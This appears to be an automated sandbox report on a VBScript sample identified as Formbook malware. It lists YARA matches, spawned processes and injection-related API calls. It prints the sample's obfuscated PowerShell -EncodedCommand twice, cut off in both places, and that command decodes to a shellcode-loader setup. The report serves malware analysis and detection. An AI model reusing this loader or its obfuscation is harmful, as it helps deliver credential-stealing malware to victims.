      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABSAGUAYQBkAEYAaQBsAGUAKABpAG4AdAAgAEQAeQBiAGIANgAwACwAdQBpAG4AdAAgAEQAeQBiAGIANgAxACwASQBuAHQAUAB0AHIAIABEAHkAYgBiADYAMgAsAHIAZQBmACAASQBuAHQAMwAyACAARAB5AGIAYgA2ADMALABpAG4AdAAgAEQAeQBiAGIANgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABEAHkAYgBiADYANQAsAGkAbgB0ACAARAB5AGIAYgA2ADYALABpAG4AdAAgAEQAeQBiAGIANgA3ACwAaQBuAHQAIABEAHkAYgBiADYAOAAsAGkAbgB0ACAARAB5AGIAYgA2ADkAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAQgBpAHMAYQBtAHMAYwBoAHUAIABEAG8AdgBlAG4AOAAgAEMAYQBsAHkAIABLAHUAbABkAGkAbwB4AGkAZAAgAGcAcgBhAGYAaQBrAHIAdQB0AGkAIABMAGsAawBlAHIAbgAgAEsAYQBuAG8AbgBpADkAIABDAGgAZQBsADkAIABlAG4AZABlAGIAYQBsAGwAZQBuACAAZABpAHMAawAgAFQAYQBkAGUAYQB3AG8AdQBjADQAIABVAGkAdABvAHQAYQBuAHUAZAA4ACAAQwB1AHQAbABhAHMAcwBmADQAI
      Source: Initial file: obj1.ShellExecute MyFile , " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: Initial file: obj1.ShellExecute "powershell.exe", " -EncodedCommand " & chr(34) & max1 & chr(34),"","",0
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8085
      Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8085
      Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.1182719160.0000000002970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.1065437367.000000001E680000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000000.1041249654.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.1181818454.00000000006C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000016.00000002.1182689732.0000000002940000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.1060812859.0000000002770000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000015.00000000.1025559293.00000000068E8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0493CCD8
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0493EA58
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0493EA49
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07D489F8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB2EF7
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA06E30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAD616
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB1FF1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EABDFCE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F841F
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAD466
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12581
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB25DD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FD5E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB2D07
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E0D20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB1D55
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB22AE
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1EBB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA03DA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAADBD2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB2B28
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB20A8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FB090
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB28EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EABE824
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA1002
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EF900
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F2B28
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325EBB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EDBD2
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F22AE
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322F900
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032E1002
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F20A8
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323B090
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F28EC
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F1FF1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03246E30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032ED616
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F2EF7
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03220D20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F2D07
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F1D55
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323D5E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F25DD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323841F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032ED466
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C2D88
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C2D90
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C9E60
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C9E5B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DE61F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006C2FB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B150 appears 35 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E9EB150 appears 45 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA296E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA297A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29540 NtReadFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA298F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA299A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA296D0 NtCreateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29610 NtEnumerateValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29670 NtQueryInformationProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29650 NtQueryValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29FE0 NtCreateMutant,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29730 NtQueryVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2A710 NtOpenProcessToken,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29760 NtOpenProcess,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2A770 NtOpenThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29770 NtSetInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA295F0 NtQueryInformationFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA295D0 NtClose,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29520 NtWaitForSingleObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2AD30 NtSetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29560 NtWriteFile,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29A80 NtOpenDirectoryObject,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29A10 NtQuerySection,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2A3B0 NtGetContextThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29B00 NtSetValueKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA298A0 NtWriteVirtualMemory,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29820 NtEnumerateKey,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2B040 NtSuspendThread,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA299D0 NtCreateProcessEx,
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA29950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269B00 NtSetValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032699A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269770 NtSetInformationFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269610 NtEnumerateValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032696E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032696D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269560 NtWriteFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032695D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032699D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032698A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032698F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032697A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03269520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032695F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA360 NtCreateFile,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA410 NtReadFile,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA490 NtClose,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA540 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA35D NtCreateFile,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA48A NtClose,
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_006DA53A NtAllocateVirtualMemory,
      Source: New _Inquiry P.O4622.vbsInitial sample: Strings found which are bigger than 50
      Source: New _Inquiry P.O4622.vbsVirustotal: Detection: 8%
      Source: New _Inquiry P.O4622.vbsReversingLabs: Detection: 13%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\New _Inquiry P.O4622.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBMAEEAQwBUAEkARgBFAFIATwAgAGIAcgBlAGcAbwAgAEsAbgBvAGIAZQB0AHMAZgByAGkAOQAgAEgAZQBzAHQAMwAgAEcAcgB1AGUAcwBvAG0ANAAgAEcAZQBuAGUAcgBhAGwAaQBzACAAQQBGAE0ARQBKACAAYgBlAGEAdgBlAHIAIABCAEkAQgBMAEkATwBHAFIAIABEAGQAbQBhAG4AZABzAGsAbgA1ACAAbgB1AGwAbABpAG4AIABsAG4AcABvAHQAcwB5AHMAdABlACAAVABoAHIAZQBhAHAAZQBkAGEAZgAgAE8AdQB0AHcAcgBlAHMAIABHAFQARQBWAEkAVgAgAFUAbgBzAGgAYQBjAGsAbABpADgAIABjAG8AcgByAGUAIABMAEEAUgBNAEUATgBTAEYAIABEAGkAcwB0AGkAbgBnAHYAOAAgAGQAaQBzAGUAbQBiAG8AIABIAFkAUABFACAAVQBuAGYAaQBsADkAIABWAEEATgBEAEIAUgBOAEQAQQAgAEcAZQBuAG4AZQAgAEIAZQBtAGUAcwB0AHIAZQA0ACAAaQBuAGQAcABhACAAQgBpAHQAcwB5AGwAZQAgAFQAZQByAG4AYQBzAGgAZQAgAEsAbwBrAGEAcgBkACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABiAHIAbgBlAGMAeQBrAGwAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIAByAGUAcwB0AGIAZQBsAGIALABpAG4AdAAgAEQAeQBiAGIANgAsAHIAZQBmACAASQBuAHQAMwAyACAAYgByAG4AZQBjAHkAawBsACwAaQBuAHQAIABhAHAAcABsAGkAZQAsAGkAbgB0ACAAYgByAG4AZQBjAHkAawBsADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAoAHMAdAByAGkAbgBnACAAaQBtAG0AYQBuACwAdQBpAG4AdAAgAEgAeQBwAG8AZwB5AG4AeQBiACwAaQBuAHQAIABEAGkAcwBjAGkAcABsADMALABpAG4AdAAgAGIAcgBuAGUAYwB5AGsAbAAwACwAaQBuAHQAIABQAGUAdAB1AG4AaQBlAHIAbgAsAGkAbgB0ACAARwByAHUAbgBnAGUAcwBtAGkAdAAsAGkAbgB0ACAARABlAG0AbwByAGEAbAA1ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyA